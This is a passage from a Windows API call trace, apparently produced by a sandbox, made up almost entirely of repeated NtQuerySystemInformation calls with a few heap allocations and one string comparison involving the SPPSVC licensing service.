(SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.644] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe010, Length=0x28, ResultLength=0x0) [0228.644] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.644] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.644] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe010, Length=0x28, ResultLength=0x0) [0228.644] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.644] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.644] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe080, Length=0x28, ResultLength=0x0) [0228.644] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.644] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.644] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe1e0, Length=0x38, ResultLength=0x0) [0228.644] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.644] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe100, Length=0x28, ResultLength=0x0) [0228.646] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.646] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.646] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.647] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.647] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.647] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.647] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe100, Length=0x28, ResultLength=0x0) [0228.647] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.647] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.647] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe1e0, Length=0x38, ResultLength=0x0) [0228.647] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe060, Length=0x20, ResultLength=0x0) [0228.647] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdfe0, Length=0x20, ResultLength=0x0) [0228.647] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.647] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdfe0, Length=0x20, ResultLength=0x0) [0228.647] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.647] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdfe0, Length=0x20, ResultLength=0x0) [0228.647] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.648] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.648] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.648] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.648] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe1e0, Length=0x38, ResultLength=0x0) [0228.648] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe060, Length=0x20, ResultLength=0x0) [0228.648] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdff0, Length=0x20, ResultLength=0x0) [0228.648] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.648] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.648] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.648] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdff0, Length=0x20, ResultLength=0x0) [0228.648] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.648] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.648] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.649] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.649] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.649] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.649] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe2b0, Length=0x50, ResultLength=0x0) [0228.649] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe230, Length=0x28, ResultLength=0x0) [0228.649] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0228.649] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.649] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.649] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe2b0, Length=0x50, ResultLength=0x0) [0228.649] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.649] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe2b0, Length=0x50, ResultLength=0x0) [0228.650] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.650] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe2b0, Length=0x50, ResultLength=0x0) [0228.650] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.650] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe1e0, Length=0x38, ResultLength=0x0) [0228.653] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.653] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe010, Length=0x28, ResultLength=0x0) [0228.653] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.653] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.653] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe010, Length=0x28, ResultLength=0x0) [0228.654] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.654] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.654] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe010, Length=0x28, ResultLength=0x0) [0228.654] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.654] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.654] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe080, Length=0x28, ResultLength=0x0) [0228.654] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.654] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.654] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe1e0, Length=0x38, ResultLength=0x0) [0228.654] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.654] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe100, Length=0x28, ResultLength=0x0) [0228.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe100, Length=0x28, ResultLength=0x0) [0228.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe1e0, Length=0x38, ResultLength=0x0) [0228.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe060, Length=0x20, ResultLength=0x0) [0228.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdfe0, Length=0x20, ResultLength=0x0) [0228.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdfe0, Length=0x20, ResultLength=0x0) [0228.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdfe0, Length=0x20, ResultLength=0x0) [0228.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.658] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.658] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.658] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.658] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe1e0, Length=0x38, ResultLength=0x0) [0228.658] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe060, Length=0x20, ResultLength=0x0) [0228.658] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdff0, Length=0x20, ResultLength=0x0) [0228.658] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.658] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.658] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.658] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdff0, Length=0x20, ResultLength=0x0) [0228.658] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.658] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.658] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.658] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.658] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.658] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe8c0, Length=0x40, ResultLength=0x0) [0228.661] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.661] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.662] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.662] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe8c0, Length=0x40, ResultLength=0x0) [0228.662] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.663] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe8c0, Length=0x40, ResultLength=0x0) [0228.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe570, Length=0x20, ResultLength=0x0) [0228.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe4f0, Length=0x20, ResultLength=0x0) [0228.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe480, Length=0x20, ResultLength=0x0) [0228.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe4f0, Length=0x20, ResultLength=0x0) [0228.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe480, Length=0x20, ResultLength=0x0) [0228.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe570, Length=0x20, ResultLength=0x0) [0228.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe8c0, Length=0x40, ResultLength=0x0) [0228.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe560, Length=0x20, ResultLength=0x0) [0228.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe4e0, Length=0x20, ResultLength=0x0) [0228.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe470, Length=0x20, ResultLength=0x0) [0228.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe4e0, Length=0x20, ResultLength=0x0) [0228.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe470, Length=0x20, ResultLength=0x0) [0228.906] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.906] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.906] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.906] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe560, Length=0x20, ResultLength=0x0) [0228.906] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.906] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.906] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.179] GetProcessHeap () returned 0x2026c630000 [0229.179] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x0, Size=0x230) returned 0x2026c66e520 [0229.179] GetProcessHeap () returned 0x2026c630000 [0229.179] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x0, Size=0x28) returned 0x2026d654290 [0229.179] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe6d0, Length=0x50, ResultLength=0x0) [0229.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe6d0, Length=0x50, ResultLength=0x0) [0229.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe6d0, Length=0x50, ResultLength=0x0) [0229.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe5c0, Length=0x50, ResultLength=0x0) [0229.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe5c0, Length=0x50, ResultLength=0x0) [0229.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe5c0, Length=0x50, ResultLength=0x0) [0229.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe5c0, Length=0x50, ResultLength=0x0) [0229.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe4f0, Length=0x38, ResultLength=0x0) [0229.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe320, Length=0x28, ResultLength=0x0) [0229.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe320, Length=0x28, ResultLength=0x0) [0229.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.219] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe320, Length=0x28, ResultLength=0x0) [0229.219] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.219] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.219] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe320, Length=0x28, ResultLength=0x0) [0229.219] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.219] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.219] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe390, Length=0x28, ResultLength=0x0) [0229.219] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.219] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.219] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe4f0, Length=0x38, ResultLength=0x0) [0229.219] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.219] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe410, Length=0x28, ResultLength=0x0) [0229.221] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.221] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.221] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.221] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe410, Length=0x28, ResultLength=0x0) [0229.221] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe2b0, Length=0x20, ResultLength=0x0) [0229.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe230, Length=0x20, ResultLength=0x0) [0229.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe230, Length=0x20, ResultLength=0x0) [0229.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe230, Length=0x20, ResultLength=0x0) [0229.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe4f0, Length=0x38, ResultLength=0x0) [0229.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe4f0, Length=0x38, ResultLength=0x0) [0229.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe370, Length=0x20, ResultLength=0x0) [0229.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe300, Length=0x20, ResultLength=0x0) [0229.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe300, Length=0x20, ResultLength=0x0) [0229.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.224] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.224] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.226] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd540, Length=0x50, ResultLength=0x0) [0229.226] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.226] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd540, Length=0x50, ResultLength=0x0) [0229.226] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.226] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd540, Length=0x50, ResultLength=0x0) [0229.226] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd430, Length=0x50, ResultLength=0x0) [0229.226] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.226] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd430, Length=0x50, ResultLength=0x0) [0229.226] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.226] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd430, Length=0x50, ResultLength=0x0) [0229.227] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.227] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd430, Length=0x50, ResultLength=0x0) [0229.227] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.227] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd360, Length=0x38, ResultLength=0x0) [0229.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd190, Length=0x28, ResultLength=0x0) [0229.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, 